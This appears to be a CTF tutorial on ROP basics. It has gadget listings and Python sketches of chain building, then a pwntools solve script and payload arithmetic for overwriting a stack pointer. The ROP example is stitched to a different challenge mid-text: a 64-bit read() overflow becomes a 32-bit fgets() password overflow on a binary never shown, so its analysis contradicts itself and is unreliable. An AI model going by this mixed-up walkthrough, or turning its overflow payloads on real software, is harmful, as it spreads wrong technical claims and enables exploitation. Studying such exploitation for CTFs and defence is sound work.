Stack Basics: ROP Basics

Introduction

ROP, or Return-Oriented Programming, is a powerful exploitation technique that turns a simple buffer overflow into something far more capable. It lets attackers run essentially arbitrary code, as long as that code can be assembled from instructions already present in the binary.

To do so, attackers typically chain together small snippets of assembly embedded within the binary itself. These “gadgets” sit at known addresses within the binary (or at known offsets from its base address if PIE is enabled).

The attacker then “chains” these gadgets, lining up several snippets so that together they achieve a goal. This can lead to RCE or similar impact, such as popping a shell, printing an arbitrary file on the server, or escalating privileges.

Typically, gadgets take the form of assembly that looks something like:

0x0000000000401209 : push rax ; add dil, dil ; loopne 0x401275 ; nop ; ret
0x000000000040101a : ret
0x0000000000401fb5 : syscall
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
0x0000000000401203 : test eax, eax ; je 0x401210 ; mov edi, 0x405088 ; jmp rax
0x0000000000401245 : test eax, eax ; je 0x401250 ; mov edi, 0x405088 ; jmp rax
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax
0x000000000040202a : xor byte ptr [rax], al ; add byte ptr [rax + 0x29], cl ; ret 0x8948

Some gadgets are exceptionally useful for ROP, notably syscall, pop rdi ; ret, and anything of the form mov QWORD PTR [REG2], REG1 ; ret. They allow us to make syscalls, set registers, and write any data we want to memory.

Note (Regarding the syscall gadget)

The syscall gadget is typically quite rare, and it is conveniently placed in many CTF challenges. Not to worry, though: ROP chains can be built from many different types of gadgets!

So, how exactly do these gadgets actually enable us to “chain” together code, enabling RCE?

We specifically want to focus on the gadgets that end in ret (or an equivalent control-flow instruction). The ret pops whatever address is next on the stack and jumps to it, which hands control back to our “chain” of gadgets.
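As a rough sketch of that filtering step, the snippet below parses a few lines in the same `address : insn ; insn` format as the listing above and keeps only the gadgets whose last instruction is a plain ret. The helper name `parse_gadget` is made up for this illustration and is not part of any tool.

```python
def parse_gadget(line):
    """Split 'ADDRESS : insn ; insn ; ...' into (int address, [instructions])."""
    addr_text, _, insn_text = line.partition(" : ")
    instructions = [insn.strip() for insn in insn_text.split(";")]
    return int(addr_text, 16), instructions


# A few lines copied from the gadget listing above.
listing = [
    "0x0000000000401209 : push rax ; add dil, dil ; loopne 0x401275 ; nop ; ret",
    "0x000000000040101a : ret",
    "0x0000000000401fb5 : syscall",
    "0x000000000040100f : test rax, rax ; je 0x401016 ; call rax",
]

gadgets = [parse_gadget(line) for line in listing]

# Keep only gadgets whose final instruction is a plain `ret`.
ret_gadgets = [(addr, insns) for addr, insns in gadgets if insns[-1] == "ret"]

for addr, insns in ret_gadgets:
    print(hex(addr), insns)
```

Matching on the exact string "ret" deliberately skips variants such as `ret 0x8948`, which also adjust the stack pointer and are harder to chain.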

Are you starting to see how we can utilize this?

We overflow the buffer and overwrite the saved return address (RIP) with the address of the first gadget, just as we would to call a function in a normal buffer overflow. Instead of stopping there, we place the addresses of further gadgets right after it on the stack. Each gadget returns at the end of its execution and moves on to the next one.

In this way, we can “chain” these snippets of gadgets together for RCE!
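To make the mechanics concrete, here is a toy model in plain Python. It is only a sketch: the gadget addresses, the 16-byte offset, and the zero sentinel that ends the chain are all invented for illustration, and `p64` is a small local helper that mimics the pwntools function of the same name.

```python
import struct


def p64(value):
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack("<Q", value)


# Hypothetical addresses, chosen only for this illustration.
POP_RDI_RET = 0x401111   # pop rdi ; ret
POP_RSI_RET = 0x402222   # pop rsi ; ret
END_OF_CHAIN = 0x0       # sentinel so the toy model knows when to stop

OFFSET = 16              # hypothetical distance from buffer start to saved RIP

payload = b"A" * OFFSET
payload += p64(POP_RDI_RET) + p64(0xDEADBEEF)   # gadget address, then its operand
payload += p64(POP_RSI_RET) + p64(0x1337)
payload += p64(END_OF_CHAIN)


def run_chain(stack_bytes, start):
    """Toy model of `ret`: pop 8 bytes into RIP, run that gadget, repeat."""
    regs = {}
    rsp = start

    def pop():
        nonlocal rsp
        (value,) = struct.unpack_from("<Q", stack_bytes, rsp)
        rsp += 8
        return value

    rip = pop()                      # the vulnerable function's own `ret`
    while rip != END_OF_CHAIN:
        if rip == POP_RDI_RET:
            regs["rdi"] = pop()      # pop rdi
        elif rip == POP_RSI_RET:
            regs["rsi"] = pop()      # pop rsi
        else:
            raise ValueError(f"no gadget at {rip:#x}")
        rip = pop()                  # the gadget's trailing `ret`
    return regs


print(run_chain(payload, OFFSET))
```

Every `pop()` into `rip` stands in for a ret instruction. In a real process the chain would end in a useful call or syscall rather than a sentinel address.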

Example

The challenge I use to showcase the various simple exploitation methods using ROP is on pwn.college, so I can’t publicly disclose the solutions.

However, I will use the binary with obfuscation to show the general ideas behind how ROP chains enable us to perform some high privilege attacks.

We’re given a binary with the following decompilation in Ghidra:

undefined8 main()
{
  chall();
  return 0;
}

And chall(), which appears as challenge in the listing below, has the following decompilation:

void challenge(void)
{
  ssize_t sVar1;
  undefined1 input_buff [124];
  undefined4 local_c;

  printf("Input buffer: %p.\n", input_buff);
  sVar1 = read(0,input_buff,0x1337);
  local_c = (undefined4)sVar1;
  return;
}

Pretty simple, right? This time around, we have no conveniently placed functions that read the flag or drop a shell. Just a vulnerable function.

So what do we do?

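First off, notice the leak of our buffer location. Next, the checksec output below shows that there is no stack canary guarding the return address, that NX rules out running shellcode from the stack, and that without PIE the gadget addresses are fixed: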

> checksec SAMPLE_BINARY
Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No
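The buffer leak mentioned earlier can be picked out of the program output with a small helper. The sketch below matches the format string from the decompiled printf call. The sample address is made up, and the 136-byte distance to the return address is an assumption: it holds only if input_buff sits directly below local_c, which Ghidra's default naming places at Stack[-0xc].

```python
import re

# Pattern derived from the decompiled format string "Input buffer: %p.\n".
LEAK_RE = re.compile(rb"Input buffer: (0x[0-9a-f]+)\.")


def parse_leak(line):
    """Extract the buffer address from a line printed by the challenge."""
    match = LEAK_RE.search(line)
    if match is None:
        raise ValueError("leak not found in output")
    return int(match.group(1), 16)


# Assumption: the 124-byte buffer ends where local_c begins (Stack[-0xc]),
# and the saved return address sits at Stack[0x0].
BUF_SIZE = 124
LOCAL_C_OFFSET = 0xC
OFFSET_TO_RET = BUF_SIZE + LOCAL_C_OFFSET   # 136 bytes

sample = b"Input buffer: 0x7ffd12345670.\n"  # made-up address for illustration
buf = parse_leak(sample)
print(hex(buf), hex(buf + OFFSET_TO_RET))
```

It is worth confirming the real offset in a debugger before relying on the computed value.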

Particularly of note is the fgets() call for the password. Notice that the size parameter is hardcoded to 0x20, or equivalently 32 bytes. However, the buffer itself is only 16 bytes. This means up to 32 - 16 = 16 bytes (15 bytes of input plus the terminating null byte that fgets() appends) can spill past the buffer and overwrite the other local variables.

Let’s take a look at the other variables. What could we overwrite to let us see the flag? We can already see that the flag is read into a buffer and stored in memory at flag from this line:

pcVar1 = fgets(flag,0x30,local_18);

There is also a puts() call at the end on a variable that I renamed to target. Since this variable lies above our buffer in memory, we can overwrite it. With this, all we need to do is point target at our flag buffer to hijack the puts() call into printing the flag!

puts(target);

To calculate the offset needed, we can look at how the variables are laid out in memory. Ghidra shows the following:

**************************************************************
*                          FUNCTION                          *
**************************************************************
                undefined main()
undefined         <UNASSIGNED>   <RETURN>
undefined4        Stack[0x0]:4   local_res0
undefined4        Stack[-0xc]:4  local_c
undefined4        Stack[-0x14]:4 target
undefined4        Stack[-0x18]:4 local_18
undefined1[16]    Stack[-0x28]   user_input

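In the listing, user_input starts at Stack[-0x28] and, being 16 bytes long, ends at -0x28 + 0x10 = -0x18. These offsets are relative to the saved return address (EIP). We want to overwrite target, which starts at -0x14 and, being 4 bytes long, ends at -0x14 + 0x4 = -0x10. So we need to fill everything from the start of our buffer up to -0x14.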

Thus, 0x28 - 0x14 = 0x14, so we need to write 20 bytes of padding to reach target, plus another four bytes holding the address of the flag buffer.
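The same arithmetic can be checked in a few lines of Python. This is a sketch using only the standard library: the stack offsets come from the Ghidra listing, the size comes from the fgets() call, and the flag buffer address is the one used in the solve script.

```python
import struct

USER_INPUT = -0x28     # Stack[-0x28], from the Ghidra listing
TARGET = -0x14         # Stack[-0x14], from the Ghidra listing
FGETS_SIZE = 0x20      # size argument passed to fgets()
FLAG_ADDR = 0x804A080  # address of the flag buffer used in the solve script

# Bytes of padding between the start of user_input and target.
padding = TARGET - USER_INPUT

# 32-bit little-endian address, the same bytes pwntools' p32() would produce.
payload = b"A" * padding + struct.pack("<I", FLAG_ADDR)

# fgets() stores at most size - 1 bytes, so the payload must fit in 31.
assert len(payload) <= FGETS_SIZE - 1

print(padding, len(payload))
```

The packed address contains no newline byte, so fgets() should not cut the payload short before target is overwritten.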

Here is the final solve script:

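from pwn import *

# Launch the challenge binary and wait for the password prompt
p = process("./just_do_it")
p.recvuntil(b"password.\n")

# 0x14 bytes of padding reach target, then overwrite it with the flag buffer address
payload = b"A" * 0x14
payload += p32(0x804A080)

p.sendline(payload)
p.interactive()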

Prevention

Runtime protections can prevent some buffer overflows or limit their impact, but preventing the overflow in the first place means using fgets() safely.

Tip (Safe Use of fgets)

Generally, the size argument of fgets() should be given as sizeof(buf), so that the read size is tied to the actual size of the buffer. This way, there is less of a possibility that the two fall out of sync.

Furthermore, gets() should be avoided at all costs. In fact, gets() was removed from the C standard in C11, so standard-conforming code can no longer use it.

Warning (Deprecation of gets)

The gets() function was deprecated for many years (deprecated since C99, removed in C11) because it performs no bounds checking. Using it can lead to buffer overflows and is extremely dangerous.